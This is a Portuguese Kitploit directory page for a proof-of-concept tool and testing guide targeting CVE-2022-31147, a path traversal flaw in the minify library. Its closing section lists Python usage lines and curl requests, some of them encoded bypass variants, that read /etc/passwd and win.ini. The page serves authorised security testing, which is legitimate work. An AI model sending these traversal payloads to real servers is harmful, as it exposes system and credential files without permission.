Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Webapp_Pentast — CVE-2022-31147 é uma falha de path traversal no matthiasmullie/minify. Este guia ajuda equipes de segurança a testar a leitura arbitrária de arquivos no Linux e no Windows usando Python e curl. Ele abrange geração automatizada de payloads, validação manual e práticas seguras para avaliação de vulnerabilidades. | Kitploit
Ferramentas/GitHubGitHub/amhar-hckr/webapp_pentast
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubamhar-hckr/webapp_pentast

Webapp_Pentast

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

há 11 mesesAinda não revisado

CVE-2022-31147 é uma falha de path traversal no matthiasmullie/minify. Este guia ajuda equipes de segurança a testar a leitura arbitrária de arquivos no Linux e no Windows usando Python e curl. Ele abrange geração automatizada de payloads, validação manual e práticas seguras para avaliação de vulnerabilidades.

Compartilhar

CVE-2022-31147 Prova de Conceito e Guia de Testes Manuais

Este guia fornece metodologias abrangentes para testar a CVE-2022-31147, uma vulnerabilidade crítica de traversal de caminho que afeta a biblioteca matthiasmullie/minify, amplamente utilizada. A vulnerabilidade permite que atacantes explorem a sanitização insuficiente de entrada no endpoint minify, potencialmente possibilitando operações arbitrárias de leitura de arquivos em servidores Linux e Windows. Este guia é voltado para profissionais de segurança, testadores de penetração e pesquisadores que buscam avaliar a exposição de aplicações web a essa ameaça.

O núcleo do guia é um script automatizado de prova de conceito em Python, que gera e testa sistematicamente uma ampla variedade de payloads de traversal. Esses payloads utilizam várias profundidades de traversal de diretórios (../), múltiplos esquemas de codificação (como codificação de URL e codificação dupla) e variações de endpoint (incluindo extensões falsas e parâmetros de consulta) para contornar mecanismos comuns de roteamento e filtragem. Ao aproveitar essas técnicas, o script maximiza a probabilidade de detectar configurações vulneráveis, mesmo em ambientes protegidos por firewalls de aplicação web básicos ou lógica de roteamento personalizada.

A precisão da detecção é ainda mais aprimorada por heurísticas integradas que analisam o conteúdo das respostas em busca de marcadores de arquivos conhecidos. Para alvos Linux, o script procura padrões típicos de /etc/passwd ou outros arquivos sensíveis, enquanto para sistemas Windows procura indicadores em arquivos como win.ini. Essa abordagem garante que a exploração bem-sucedida seja identificada com confiabilidade, minimizando falsos positivos e agilizando o processo de validação.

Além dos testes automatizados, o guia descreve técnicas manuais de validação usando curl, permitindo que profissionais criem e enviem solicitações personalizadas para análises direcionadas ou para verificar descobertas de forma independente. A importância de testes seguros e autorizados é enfatizada ao longo do guia, incluindo a importância de conduzir avaliações apenas em sistemas para os quais foi concedida permissão explícita.

O guia foi projetado para apoiar tanto a validação rápida quanto a análise aprofundada, acomodando alvos de arquivo personalizados e estratégias avançadas de bypass. Ele pode ser integrado a fluxos de trabalho mais amplos de avaliação de vulnerabilidades, fornecendo insights acionáveis para remediação e gerenciamento de riscos. Ao seguir as metodologias apresentadas, as equipes de segurança podem efetivamente identificar, validar e tratar exposições à CVE-2022-31147 em seus ambientes, fortalecendo a postura de segurança geral de suas aplicações web.

PoC Automatizado em Python

Exemplo de Alvo Linux

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --linux --file /etc/passwd

Exemplo de Alvo Windows

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --windows --file C:\Windows\win.ini

Teste Mais Seguro (Recomendado)

Crie um arquivo inofensivo no servidor e tente lê-lo:

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --file /var/www/test.txt

Testes Manuais com curl

Traversal de Caminho no Linux

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd"

Traversal de Caminho no Windows

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../windows/win.ini"

Variantes de Bypass

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/%2e%2e/../%2e%2e/../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd.css"

Notas

  • Substitua https://yourdomain.tld/cdn/minify pela URL real do seu alvo.
  • Para testes mais seguros, use um arquivo que você controla e sabe que existe no servidor.
  • Sempre tenha permissão antes de testar em qualquer sistema.

Referências

  • CVE-2022-31147
Baixar ferramenta